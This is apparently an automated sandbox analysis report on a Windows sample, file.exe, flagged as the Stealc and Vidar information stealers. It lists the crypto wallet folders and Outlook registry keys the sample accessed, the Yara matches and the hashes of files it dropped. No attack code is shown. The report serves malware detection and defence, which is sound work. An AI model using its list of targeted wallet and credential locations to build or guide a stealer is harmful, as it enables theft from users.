Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Binance\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Coinomi\Coinomi\wallets\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Local Storage\leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Ledger Live\Session Storage\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\config\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\atomic_qt\exports\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB\https_guarda.co_0.indexeddb.leveldb\	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Guarda\Local Storage\leveldb\	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000004	Jump to behavior

Yara detected Credential Stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

Remote Access Functionality

Yara detected Stealc

Source: Yara match	File source: 0.2.file.exe.760000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.1638110314.000000000123E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1411403203.0000000005100000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.1637318654.0000000000761000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7476, type: MEMORYSTR

ID:	1518819
Product:	CloudBasic
Start time:	02:39:10
Start date:	26.09.2024
Sample:	file.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	ef4d942f44362d48b109c8a182ba537d
SHA1:	b2732ce2977293e2f08e4ddfc0012a6673208692
SHA256:	fb2fdeded1386ef31205d4e56c05942f49b0292688d14bdc0616c22cae4567b3
Filetype:	Win32 Executable (generic) a (10002005/4) 99.96%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\AFCBFIJEHDHCBGDGDGCB	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1	28222628A3465C5F0D4B28F70F97F482	1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14	93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
C:\ProgramData\AKEGDHJDHDAFHJJKJEHC	ASCII text, with very long lines (1765), with CRLF line terminators	42594FD09C4DF3B174CF5D59B1CAB13A	1B78FEB748C36A592C468A76BB60E98187D7BE4A	F8B55E3B04E0A59BB745C43763D8FBC1CFFDBC247B5525A489B4B74A57319393
C:\ProgramData\AKKKFBGDHJKFHJJJJDGC	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1	9E68EA772705B5EC0C83C2A97BB26324	243128040256A9112CEAC269D56AD6B21061FF80	17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
C:\ProgramData\BFCFBKKKFHCFHJKFIIEHDBGCBK	SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7	CFFF4E2B77FC5A18AB6323AF9BF95339	3AA2C2115A8EB4516049600E8832E9BFFE0C2412	EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
C:\ProgramData\CAKKKFBFIDGDBFHJJEHIDHDAAF	SQLite 3.x database, user version 75, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 2, database pages 46, cookie 0x26, schema 4, UTF-8, version-valid-for 2	85D6E1D7F82C11DAC40C95C06B7B5DC5	96EA790BA7A295D78AD5A5019D7EA5E9E8F4B0BD	D9AD18D2A91CB42FD55695B562D76337BBB4A6AEB45D28C4554297B4EE0DC800
C:\ProgramData\DAECAECFCAAEBFHIEHDGHDHCBA	SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3	369B6DD66F1CAD49D0952C40FEB9AD41	D05B2DE29433FB113EC4C558FF33087ED7481DD4	14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
C:\ProgramData\EGDGIEGH	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7	EFD26666EAE0E87B32082FF52F9F4C5E	603BFE6A7D6C0EC4B8BA1D38AEA6EFADDC42B5E0	67D4CAA4255418EB18873F01597D1F4257C4146D1DCED78E26D5FD76B783F416
C:\ProgramData\IDAAFBGD	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3	64BCCF32ED2142E76D142DF7AAC75730	30AB1540F7909BEE86C0542B2EBD24FB73E5D629	B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
C:\ProgramData\JKFCBAEHCAEGDHJKFHJKFIJKJE	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4	BE99679A2B018331EACD3A1B680E3757	6E6732E173C91B0C3287AB4B161FE3676D33449A	C382A020682EDEE086FBC56D11E70214964D39318774A19B184672E9FD0DD3E0
C:\ProgramData\freebl3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\ProgramData\mozglue.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\ProgramData\msvcp140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\ProgramData\nss3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\ProgramData\softokn3.dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\ProgramData\vcruntime140.dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\freebl3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	550686C0EE48C386DFCB40199BD076AC	EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB	EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\mozglue[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	C8FD9BE83BC728CC04BEFFAFC2907FE9	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\msvcp140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	5FF1FCA37C466D6723EC67BE93B51442	34CC4E158092083B13D67D6D2BC9E57B798A303B	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\nss3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	1CC453CDF74F31E4D913FF9C10ACDDE2	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\softokn3[1].dll	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows	4E52D739C324DB8225BD9AB2695F262F	71C3DA43DC5A0D2A1941E874A6D015A071783889	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\NCK9WNDU\vcruntime140[1].dll	PE32 executable (DLL) (console) Intel 80386, for MS Windows	A37EE36B536409056A86F50E67777DD7	1CAFA159292AA736FC595FC04E16325B27CD6750	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\cookies.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\24a4ohrz.default-release\places.sqlite-shm	data	B7C14EC6110FA820CA6B65F5AEC85911	608EEB7488042453C9CA40F7E1398FC1A270F3F4	FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB

Windows Analysis Report
file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel
Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Malware Threat Intel Provided by

Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Contacted URLs

Windows Analysis Report
file.exe

Malware Threat Intel
Provided by